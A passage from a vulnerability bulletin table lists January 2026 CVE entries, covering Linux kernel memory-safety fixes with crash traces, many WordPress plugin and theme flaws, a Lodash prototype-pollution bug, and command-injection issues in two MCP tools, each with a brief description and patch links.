offload then it is up to the class driver to ensure endpoint is properly set up. | 2026-01-25 | not yet calculated | CVE-2026-23009 | https://git.kernel.org/stable/c/34f6634dba87ef72b3c3a3a524be663adef7ab42 https://git.kernel.org/stable/c/dd83dc1249737b837ac5d57c81f2b0977c613d9f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv6: Fix use-after-free in inet6_addr_del(). syzbot reported use-after-free of inet6_ifaddr in inet6_addr_del(). [0] The cited commit accidentally moved ipv6_del_addr() for mngtmpaddr before reading its ifp->flags for temporary addresses in inet6_addr_del(). Let's move ipv6_del_addr() down to fix the UAF. [0]: BUG: KASAN: slab-use-after-free in inet6_addr_del.constprop.0+0x67a/0x6b0 net/ipv6/addrconf.c:3117 Read of size 4 at addr ffff88807b89c86c by task syz.3.1618/9593 CPU: 0 UID: 0 PID: 9593 Comm: syz.3.1618 Not tainted syzkaller #0 PREEMPT(full) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025 Call Trace: <TASK> __dump_stack lib/dump_stack.c:94 [inline] dump_stack_lvl+0x116/0x1f0 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0xcd/0x630 mm/kasan/report.c:482 kasan_report+0xe0/0x110 mm/kasan/report.c:595 inet6_addr_del.constprop.0+0x67a/0x6b0 net/ipv6/addrconf.c:3117 addrconf_del_ifaddr+0x11e/0x190 net/ipv6/addrconf.c:3181 inet6_ioctl+0x1e5/0x2b0 net/ipv6/af_inet6.c:582 sock_do_ioctl+0x118/0x280 net/socket.c:1254 sock_ioctl+0x227/0x6b0 net/socket.c:1375 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:597 [inline] __se_sys_ioctl fs/ioctl.c:583 [inline] __x64_sys_ioctl+0x18e/0x210 fs/ioctl.c:583 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xcd/0xf80 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f164cf8f749 Code: ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 a8 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f164de64038 EFLAGS: 00000246 ORIG_RAX: 0000000000000010 RAX: ffffffffffffffda RBX: 00007f164d1e5fa0 RCX: 00007f164cf8f749 RDX: 0000200000000000 RSI: 0000000000008936 RDI: 0000000000000003 RBP: 00007f164d013f91 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000 R13: 00007f164d1e6038 R14: 00007f164d1e5fa0 R15: 00007ffde15c8288 </TASK> Allocated by task 9593: kasan_save_stack+0x33/0x60 mm/kasan/common.c:56 kasan_save_track+0x14/0x30 mm/kasan/common.c:77 poison_kmalloc_redzone mm/kasan/common.c:397 [inline] __kasan_kmalloc+0xaa/0xb0 mm/kasan/common.c:414 kmalloc_noprof include/linux/slab.h:957 [inline] kzalloc_noprof include/linux/slab.h:1094 [inline] ipv6_add_addr+0x4e3/0x2010 net/ipv6/addrconf.c:1120 inet6_addr_add+0x256/0x9b0 net/ipv6/addrconf.c:3050 addrconf_add_ifaddr+0x1fc/0x450 net/ipv6/addrconf.c:3160 inet6_ioctl+0x103/0x2b0 net/ipv6/af_inet6.c:580 sock_do_ioctl+0x118/0x280 net/socket.c:1254 sock_ioctl+0x227/0x6b0 net/socket.c:1375 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:597 [inline] __se_sys_ioctl fs/ioctl.c:583 [inline] __x64_sys_ioctl+0x18e/0x210 fs/ioctl.c:583 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xcd/0xf80 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f Freed by task 6099: kasan_save_stack+0x33/0x60 mm/kasan/common.c:56 kasan_save_track+0x14/0x30 mm/kasan/common.c:77 kasan_save_free_info+0x3b/0x60 mm/kasan/generic.c:584 poison_slab_object mm/kasan/common.c:252 [inline] __kasan_slab_free+0x5f/0x80 mm/kasan/common.c:284 kasan_slab_free include/linux/kasan.h:234 [inline] slab_free_hook mm/slub.c:2540 [inline] slab_free_freelist_hook mm/slub.c:2569 [inline] slab_free_bulk mm/slub.c:6696 [inline] kmem_cache_free_bulk mm/slub.c:7383 [inline] kmem_cache_free_bulk+0x2bf/0x680 mm/slub.c:7362 kfree_bulk include/linux/slab.h:830 [inline] kvfree_rcu_bulk+0x1b7/0x1e0 mm/slab_common.c:1523 kvfree_rcu_drain_ready mm/slab_common.c:1728 [inline] kfree_rcu_monitor+0x1d0/0x2f0 mm/slab_common.c:1801 process_one_work+0x9ba/0x1b20 kernel/workqueue.c:3257 process_scheduled_works kernel/workqu ---truncated--- | 2026-01-25 | not yet calculated | CVE-2026-23010 | https://git.kernel.org/stable/c/2684610a9c9c53f262fd864fa5c407e79f304804 https://git.kernel.org/stable/c/8b6dcb565e419846bd521e31d5e1f98e4d0e1179 https://git.kernel.org/stable/c/ddf96c393a33aef4887e2e406c76c2f8cda1419c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv4: ip_gre: make ipgre_header() robust Analog to commit db5b4e39c4e6 ("ip6_gre: make ip6gre_header() robust") Over the years, syzbot found many ways to crash the kernel in ipgre_header() [1]. This involves team or bonding drivers ability to dynamically change their dev->needed_headroom and/or dev->hard_header_len In this particular crash mld_newpack() allocated an skb with a too small reserve/headroom, and by the time mld_sendpack() was called, syzbot managed to attach an ipgre device. [1] skbuff: skb_under_panic: text:ffffffff89ea3cb7 len:2030915468 put:2030915372 head:ffff888058b43000 data:ffff887fdfa6e194 tail:0x120 end:0x6c0 dev:team0 kernel BUG at net/core/skbuff.c:213 ! Oops: invalid opcode: 0000 [#1] SMP KASAN PTI CPU: 1 UID: 0 PID: 1322 Comm: kworker/1:9 Not tainted syzkaller #0 PREEMPT(full) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025 Workqueue: mld mld_ifc_work RIP: 0010:skb_panic+0x157/0x160 net/core/skbuff.c:213 Call Trace: <TASK> skb_under_panic net/core/skbuff.c:223 [inline] skb_push+0xc3/0xe0 net/core/skbuff.c:2641 ipgre_header+0x67/0x290 net/ipv4/ip_gre.c:897 dev_hard_header include/linux/netdevice.h:3436 [inline] neigh_connected_output+0x286/0x460 net/core/neighbour.c:1618 NF_HOOK_COND include/linux/netfilter.h:307 [inline] ip6_output+0x340/0x550 net/ipv6/ip6_output.c:247 NF_HOOK+0x9e/0x380 include/linux/netfilter.h:318 mld_sendpack+0x8d4/0xe60 net/ipv6/mcast.c:1855 mld_send_cr net/ipv6/mcast.c:2154 [inline] mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693 process_one_work kernel/workqueue.c:3257 [inline] process_scheduled_works+0xad1/0x1770 kernel/workqueue.c:3340 worker_thread+0x8a0/0xda0 kernel/workqueue.c:3421 kthread+0x711/0x8a0 kernel/kthread.c:463 ret_from_fork+0x510/0xa50 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:246 | 2026-01-25 | not yet calculated | CVE-2026-23011 | https://git.kernel.org/stable/c/aa57bfea4674e6da8104fa3a37760a6f5f255dad https://git.kernel.org/stable/c/554201ed0a8f4d32e719f42caeaeb2735a9ed6ca https://git.kernel.org/stable/c/e67c577d89894811ce4dcd1a9ed29d8b63476667 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/damon/core: remove call_control in inactive contexts If damon_call() is executed against a DAMON context that is not running, the function returns error while keeping the damon_call_control object linked to the context's call_controls list. Let's suppose the object is deallocated after the damon_call(), and yet another damon_call() is executed against the same context. The function tries to add the new damon_call_control object to the call_controls list, which still has the pointer to the previous damon_call_control object, which is deallocated. As a result, use-after-free happens. This can actually be triggered using the DAMON sysfs interface. It is not easily exploitable since it requires the sysfs write permission and making a definitely weird file writes, though. Please refer to the report for more details about the issue reproduction steps. Fix the issue by making two changes. Firstly, move the final kdamond_call() for cancelling all existing damon_call() requests from terminating DAMON context to be done before the ctx->kdamond reset. This makes any code that sees NULL ctx->kdamond can safely assume the context may not access damon_call() requests anymore. Secondly, let damon_call() to cleanup the damon_call_control objects that were added to the already-terminated DAMON context, before returning the error. | 2026-01-25 | not yet calculated | CVE-2026-23012 | https://git.kernel.org/stable/c/23b061f421eef03647b512f3df48861706c87db3 https://git.kernel.org/stable/c/f9132fbc2e83baf2c45a77043672a63a675c9394 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: octeon_ep_vf: fix free_irq dev_id mismatch in IRQ rollback octep_vf_request_irqs() requests MSI-X queue IRQs with dev_id set to ioq_vector. If request_irq() fails part-way, the rollback loop calls free_irq() with dev_id set to 'oct', which does not match the original dev_id and may leave the irqaction registered. This can keep IRQ handlers alive while ioq_vector is later freed during unwind/teardown, leading to a use-after-free or crash when an interrupt fires. Fix the error path to free IRQs with the same ioq_vector dev_id used during request_irq(). | 2026-01-25 | not yet calculated | CVE-2026-23013 | https://git.kernel.org/stable/c/aa05a8371ae4a452df623f7202c72409d3c50e40 https://git.kernel.org/stable/c/aa4c066229b05fc3d3c5f42693d25b1828533b6e https://git.kernel.org/stable/c/f93fc5d12d69012788f82151bee55fce937e1432 |
| linux4me2--Menu In Post | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in linux4me2 Menu In Post menu-in-post allows DOM-Based XSS. This issue affects Menu In Post: from n/a through <= 1.4.1. | 2026-01-22 | not yet calculated | CVE-2026-22349 | https://patchstack.com/database/Wordpress/Plugin/menu-in-post/vulnerability/wordpress-menu-in-post-plugin-1-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| livemesh--Livemesh Addons for WPBakery Page Builder | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in livemesh Livemesh Addons for WPBakery Page Builder addons-for-visual-composer allows Stored XSS. This issue affects Livemesh Addons for WPBakery Page Builder: from n/a through <= 3.9.4. | 2026-01-23 | not yet calculated | CVE-2026-24594 | https://patchstack.com/database/Wordpress/Plugin/addons-for-visual-composer/vulnerability/wordpress-livemesh-addons-for-wpbakery-page-builder-plugin-3-9-4-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Lodash--Lodash | Lodash versions 4.0.0 through 4.17.22 are vulnerable to prototype pollution in the _.unset and _.omit functions. An attacker can pass crafted paths which cause Lodash to delete methods from global prototypes. The issue permits deletion of properties but does not allow overwriting their original behavior. This issue is patched on 4.17.23 | 2026-01-21 | not yet calculated | CVE-2025-13465 | https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg |
| LogicHunt--Logo Slider | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LogicHunt Logo Slider logo-slider-wp allows Stored XSS. This issue affects Logo Slider: from n/a through <= 4.9.0. | 2026-01-23 | not yet calculated | CVE-2026-24626 | https://patchstack.com/database/Wordpress/Plugin/logo-slider-wp/vulnerability/wordpress-logo-slider-plugin-4-9-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Ludwig You--WPMasterToolKit | Missing Authorization vulnerability in Ludwig You WPMasterToolKit wpmastertoolkit allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WPMasterToolKit: from n/a through <= 2.14.0. | 2026-01-22 | not yet calculated | CVE-2026-24388 | https://patchstack.com/database/Wordpress/Plugin/wpmastertoolkit/vulnerability/wordpress-wpmastertoolkit-plugin-2-14-0-broken-access-control-vulnerability?_s_id=cve |
| M-Files Corporation--M-Files Server | Denial-of-service vulnerability in M-Files Server versions before 26.1.15632.3 allows an authenticated attacker with vault administrator privileges to crash the M-Files Server process by calling a vulnerable API endpoint. | 2026-01-21 | not yet calculated | CVE-2026-0663 | https://product.m-files.com/security-advisories/cve-2026-0663/ |
| mackron--dr_flac | dr_flac, an audio decoder within the dr_libs toolset, contains an integer overflow vulnerability flaw due to trusting the totalPCMFrameCount field from FLAC metadata before calculating buffer size, allowing an attacker with a specially crafted file to perform DoS against programs using the tool. | 2026-01-20 | not yet calculated | CVE-2025-14369 | https://github.com/mackron/dr_libs/commit/b2197b2eb7bb609df76315bebf44db4ec2a1aed0 |
| magentech--MaxShop | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in magentech MaxShop sw_maxshop allows PHP Local File Inclusion. This issue affects MaxShop: from n/a through <= 3.6.20. | 2026-01-22 | not yet calculated | CVE-2025-69047 | https://patchstack.com/database/Wordpress/Theme/sw_maxshop/vulnerability/wordpress-maxshop-theme-3-6-20-local-file-inclusion-vulnerability?_s_id=cve |
| Mahmudul Hasan Arif--FluentBoards | Missing Authorization vulnerability in Mahmudul Hasan Arif FluentBoards fluent-boards allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects FluentBoards: from n/a through <= 1.91.1. | 2026-01-23 | not yet calculated | CVE-2026-24561 | https://patchstack.com/database/Wordpress/Plugin/fluent-boards/vulnerability/wordpress-fluentboards-plugin-1-91-1-broken-access-control-vulnerability?_s_id=cve |
| MailerLite--MailerLite WooCommerce integration | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in MailerLite MailerLite - WooCommerce integration woo-mailerlite allows SQL Injection. This issue affects MailerLite - WooCommerce integration: from n/a through <= 3.1.2. | 2026-01-22 | not yet calculated | CVE-2025-67945 | https://patchstack.com/database/Wordpress/Plugin/woo-mailerlite/vulnerability/wordpress-mailerlite-woocommerce-integration-plugin-3-1-2-sql-injection-vulnerability?_s_id=cve |
| ManageIQ--manageiq | ManageIQ is an open-source management platform. A flaw was found in the ManageIQ API prior to version radjabov-2 where a malformed TimeProfile could be created causing later UI and API requests to timeout leading to a Denial of Service. Version radjabov-2 contains a patch. One may also apply the patch manually. | 2026-01-21 | not yet calculated | CVE-2026-22598 | https://github.com/ManageIQ/manageiq/security/advisories/GHSA-m832-x3g8-63j3 https://github.com/ManageIQ/manageiq/commit/79cef10c7d0278d8a37c3f547c426948180df4df.patch https://github.com/ManageIQ/manageiq/commit/86132851257d73ed9e31a88315e47a8a2b838113 |
| Marco Milesi--ANAC XML Viewer | Server-Side Request Forgery (SSRF) vulnerability in Marco Milesi ANAC XML Viewer anac-xml-viewer allows Server Side Request Forgery. This issue affects ANAC XML Viewer: from n/a through <= 1.8.2. | 2026-01-22 | not yet calculated | CVE-2025-64252 | https://patchstack.com/database/Wordpress/Plugin/anac-xml-viewer/vulnerability/wordpress-anac-xml-viewer-plugin-1-8-2-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| Marco van Wieren--WPO365 | Server-Side Request Forgery (SSRF) vulnerability in Marco van Wieren WPO365 wpo365-login allows Server Side Request Forgery. This issue affects WPO365: from n/a through <= 40.0. | 2026-01-22 | not yet calculated | CVE-2025-67961 | https://patchstack.com/database/Wordpress/Plugin/wpo365-login/vulnerability/wordpress-wpo365-plugin-40-0-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| Marcus (aka @msykes)--WP FullCalendar | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Marcus (aka @msykes) WP FullCalendar wp-fullcalendar allows Retrieve Embedded Sensitive Data. This issue affects WP FullCalendar: from n/a through <= 1.6. | 2026-01-23 | not yet calculated | CVE-2026-24523 | https://patchstack.com/database/Wordpress/Plugin/wp-fullcalendar/vulnerability/wordpress-wp-fullcalendar-plugin-1-6-sensitive-data-exposure-vulnerability?_s_id=cve |
| Mario Peshev--WP-CRM System | Missing Authorization vulnerability in Mario Peshev WP-CRM System wp-crm-system allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP-CRM System: from n/a through <= 3.4.5. | 2026-01-22 | not yet calculated | CVE-2025-62106 | https://patchstack.com/database/Wordpress/Plugin/wp-crm-system/vulnerability/wordpress-wp-crm-system-plugin-3-4-5-broken-access-control-vulnerability-2?_s_id=cve |
| marynixie--Related Posts Thumbnails Plugin for WordPress | Cross-Site Request Forgery (CSRF) vulnerability in marynixie Related Posts Thumbnails Plugin for WordPress related-posts-thumbnails allows Cross Site Request Forgery. This issue affects Related Posts Thumbnails Plugin for WordPress: from n/a through <= 4.3.1. | 2026-01-23 | not yet calculated | CVE-2026-24596 | https://patchstack.com/database/Wordpress/Plugin/related-posts-thumbnails/vulnerability/wordpress-related-posts-thumbnails-plugin-for-wordpress-plugin-4-3-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| matiskiba--Ravpage | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in matiskiba Ravpage ravpage allows Reflected XSS. This issue affects Ravpage: from n/a through <= 2.33. | 2026-01-22 | not yet calculated | CVE-2025-68835 | https://patchstack.com/database/Wordpress/Plugin/ravpage/vulnerability/wordpress-ravpage-plugin-2-33-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| MCP Manager for Claude Desktop--MCP Manager for Claude Desktop | MCP Manager for Claude Desktop execute-command Command Injection Sandbox Escape Vulnerability. This vulnerability allows remote attackers to bypass the sandbox on affected installations of MCP Manager for Claude Desktop. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of MCP config objects. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to escape the sandbox and execute arbitrary code in the context of the current process at medium integrity. Was ZDI-CAN-27810. | 2026-01-23 | not yet calculated | CVE-2026-0757 | ZDI-26-023 |
| mcp-server-siri-shortcuts--mcp-server-siri-shortcuts | mcp-server-siri-shortcuts shortcutName Command Injection Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of mcp-server-siri-shortcuts. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the shortcutName parameter. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the service account. Was ZDI-CAN-27910. | 2026-01-23 | not yet calculated | CVE-2026-0758 | ZDI-26-024 |
| merkulove--Audier For Elementor | Missing Authorization vulnerability in merkulove Audier For Elementor audier-elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Audier For Elementor: from n/a through <= 1.0.9. | 2026-01-22 | not yet calculated | CVE-2025-66139 | https://patchstack.com/database/Wordpress/Plugin/audier-elementor/vulnerability/wordpress-audier-for-elementor-plugin-1-0-9-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Carter for Elementor | Missing Authorization vulnerability in merkulove Carter for Elementor carter-elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Carter for Elementor: from n/a through <= 1.0.2. | 2026-01-22 | not yet calculated | CVE-2025-66136 | https://patchstack.com/database/Wordpress/Plugin/carter-elementor/vulnerability/wordpress-carter-for-elementor-plugin-1-0-2-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Comparimager for Elementor | Missing Authorization vulnerability in merkulove Comparimager for Elementor comparimager-elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Comparimager for Elementor: from n/a through <= 1.0.1. | 2026-01-22 | not yet calculated | CVE-2025-66142 | https://patchstack.com/database/Wordpress/Plugin/comparimager-elementor/vulnerability/wordpress-comparimager-for-elementor-plugin-1-0-1-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Crumber | Missing Authorization vulnerability in merkulove Crumber crumber-elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Crumber: from n/a through <= 1.0.10. | 2026-01-22 | not yet calculated | CVE-2025-66143 | https://patchstack.com/database/Wordpress/Plugin/crumber-elementor/vulnerability/wordpress-crumber-plugin-1-0-10-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Imager for Elementor | Missing Authorization vulnerability in merkulove Imager for Elementor imager-elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Imager for Elementor: from n/a through <= 2.0.4. | 2026-01-22 | not yet calculated | CVE-2025-66135 | https://patchstack.com/database/Wordpress/Plugin/imager-elementor/vulnerability/wordpress-imager-for-elementor-plugin-2-0-4-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Motionger for Elementor | Missing Authorization vulnerability in merkulove Motionger for Elementor motionger-elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Motionger for Elementor: from n/a through <= 2.0.4. | 2026-01-22 | not yet calculated | CVE-2025-66138 | https://patchstack.com/database/Wordpress/Plugin/motionger-elementor/vulnerability/wordpress-motionger-for-elementor-plugin-2-0-4-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Scroller | Missing Authorization vulnerability in merkulove Scroller scroller allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Scroller: from n/a through <= 2.0.2. | 2026-01-22 | not yet calculated | CVE-2025-66141 | https://patchstack.com/database/Wordpress/Plugin/scroller/vulnerability/wordpress-scroller-plugin-2-0-2-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Searcher for Elementor | Missing Authorization vulnerability in merkulove Searcher for Elementor searcher-elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Searcher for Elementor: from n/a through <= 1.0.3. | 2026-01-22 | not yet calculated | CVE-2025-66137 | https://patchstack.com/database/Wordpress/Plugin/searcher-elementor/vulnerability/wordpress-searcher-for-elementor-plugin-1-0-3-broken-access-control-vulnerability?_s_id=cve |
| merkulove--Uper for Elementor | Missing Authorization vulnerability in merkulove Uper for Elementor uper-elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Uper for Elementor: from n/a through <= 1.0.5. | 2026-01-22 | not yet calculated | CVE-2025-66140 | https://patchstack.com/database/Wordpress/Plugin/uper-elementor/vulnerability/wordpress-uper-for-elementor-plugin-1-0-5-broken-access-control-vulnerability?_s_id=cve |
| Merv Barrett--Easy Property Listings | Missing Authorization vulnerability in Merv Barrett Easy Property Listings easy-property-listings allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Easy Property Listings: from n/a through <= 3.5.17. | 2026-01-22 | not yet calculated | CVE-2025-68072 | https://patchstack.com/database/Wordpress/Plugin/easy-property-listings/vulnerability/wordpress-easy-property-listings-plugin-3-5-16-broken-access-control-vulnerability?_s_id=cve |
| Metagauss--EventPrime | Missing Authorization vulnerability in Metagauss EventPrime eventprime-event-calendar-management allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects EventPrime: from n/a through <= 4.2.8.0. | 2026-01-22 | not yet calculated | CVE-2026-24380 | https://patchstack.com/database/Wordpress/Plugin/eventprime-event-calendar-management/vulnerability/wordpress-eventprime-plugin-4-2-8-0-broken-access-control-vulnerability?_s_id=cve |
| Metagauss--RegistrationMagic | Cross-Site Request Forgery (CSRF) vulnerability in Metagauss RegistrationMagic custom-registration-form-builder-with-submission-manager allows Cross Site Request Forgery. This issue affects RegistrationMagic: from n/a through <= 6.0.6.9. | 2026-01-22 | not yet calculated | CVE-2026-24374 | https://patchstack.com/database/Wordpress/Plugin/custom-registration-form-builder-with-submission-manager/vulnerability/wordpress-registrationmagic-plugin-6-0-6-9-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Micro.company--Form to Chat App | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Micro.company Form to Chat App form-to-chat allows Stored XSS. This issue affects Form to Chat App: from n/a through <= 1.2.5. | 2026-01-22 | not yet calculated | CVE-2026-22463 | https://patchstack.com/database/Wordpress/Plugin/form-to-chat/vulnerability/wordpress-form-to-chat-app-plugin-1-2-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Mikado-Themes--Biagiotti | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Biagiotti biagiotti allows PHP Local File Inclusion. This issue affects Biagiotti: from n/a through < 3.5.2. | 2026-01-22 | not yet calculated | CVE-2025-67938 | https://patchstack.com/database/Wordpress/Theme/biagiotti/vulnerability/wordpress-biagiotti-theme-3-5-2-local-file-inclusion-vulnerability?_s_id=cve |
| Mikado-Themes--Cocco | Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Cocco cocco allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Cocco: from n/a through <= 1.5.1. | 2026-01-22 | not yet calculated | CVE-2026-22391 | https://patchstack.com/database/Wordpress/Theme/cocco/vulnerability/wordpress-cocco-theme-1-5-1-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Mikado-Themes--Curly | Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Curly curly allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Curly: from n/a through <= 3.3. | 2026-01-22 | not yet calculated | CVE-2026-22393 | https://patchstack.com/database/Wordpress/Theme/curly/vulnerability/wordpress-curly-theme-3-3-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Mikado-Themes--Depot | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Depot depot allows PHP Local File Inclusion. This issue affects Depot: from n/a through <= 1.16. | 2026-01-22 | not yet calculated | CVE-2025-54003 | https://patchstack.com/database/Wordpress/Theme/depot/vulnerability/wordpress-depot-theme-1-16-local-file-inclusion-vulnerability?_s_id=cve |
| Mikado-Themes--Dolcino | Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Dolcino dolcino allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Dolcino: from n/a through <= 1.6. | 2026-01-22 | not yet calculated | CVE-2026-22411 | https://patchstack.com/database/Wordpress/Theme/dolcino/vulnerability/wordpress-dolcino-theme-1-6-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Mikado-Themes--Fiorello | Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Fiorello fiorello allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Fiorello: from n/a through <= 1.0. | 2026-01-22 | not yet calculated | CVE-2026-22396 | https://patchstack.com/database/Wordpress/Theme/fiorello/vulnerability/wordpress-fiorello-theme-1-0-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Mikado-Themes--Fleur | Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Fleur fleur allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Fleur: from n/a through <= 2.0. | 2026-01-22 | not yet calculated | CVE-2026-22398 | https://patchstack.com/database/Wordpress/Theme/fleur/vulnerability/wordpress-fleur-theme-2-0-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Mikado-Themes--Holmes | Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Holmes holmes allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Holmes: from n/a through <= 1.7. | 2026-01-22 | not yet calculated | CVE-2026-22400 | https://patchstack.com/database/Wordpress/Theme/holmes/vulnerability/wordpress-holmes-theme-1-7-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Mikado-Themes--Innovio | Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Innovio innovio allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Innovio: from n/a through <= 1.7. | 2026-01-22 | not yet calculated | CVE-2026-22404 | https://patchstack.com/database/Wordpress/Theme/innovio/vulnerability/wordpress-innovio-theme-1-7-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Mikado-Themes--Justicia | Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Justicia justicia allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Justicia: from n/a through <= 1.2. | 2026-01-22 | not yet calculated | CVE-2026-22409 | https://patchstack.com/database/Wordpress/Theme/justicia/vulnerability/wordpress-justicia-theme-1-2-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Mikado-Themes--Overton | Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Overton overton allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Overton: from n/a through <= 1.3. | 2026-01-22 | not yet calculated | CVE-2026-22406 | https://patchstack.com/database/Wordpress/Theme/overton/vulnerability/wordpress-overton-theme-1-3-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| Mikado-Themes--PawFriends - Pet Shop and Veterinary WordPress Theme | Cross-Site Request Forgery (CSRF) vulnerability in Mikado-Themes PawFriends - Pet Shop and Veterinary WordPress Theme pawfriends allows Cross Site Request Forgery. This issue affects PawFriends - Pet Shop and Veterinary WordPress Theme: from n/a through <= 1.3. | 2026-01-22 | not yet calculated | CVE-2026-22382 | https://patchstack.com/database/Wordpress/Theme/pawfriends/vulnerability/wordpress-pawfriends-pet-shop-and-veterinary-wordpress-theme-theme-1-3-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Mikado-Themes--Powerlift | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Powerlift powerlift allows PHP Local File Inclusion. This issue affects Powerlift: from n/a through < 3.2.1. | 2026-01-22 | not yet calculated | CVE-2025-67940 | https://patchstack.com/database/Wordpress/Theme/powerlift/vulnerability/wordpress-powerlift-theme-3-2-1-local-file-inclusion-vulnerability?_s_id=cve |
| Mikado-Themes--Roam | Authorization Bypass Through User-Controlled Key vulnerability in Mikado-Themes Roam roam allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Roam: from n/a through <= 2.1.1. | 2026-01-22 | not yet calculated | CVE-2026-22407 | https://patchstack.com/database/Wordpress/Theme/roam/vulnerability/wordpress-roam-theme-2-1-1-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
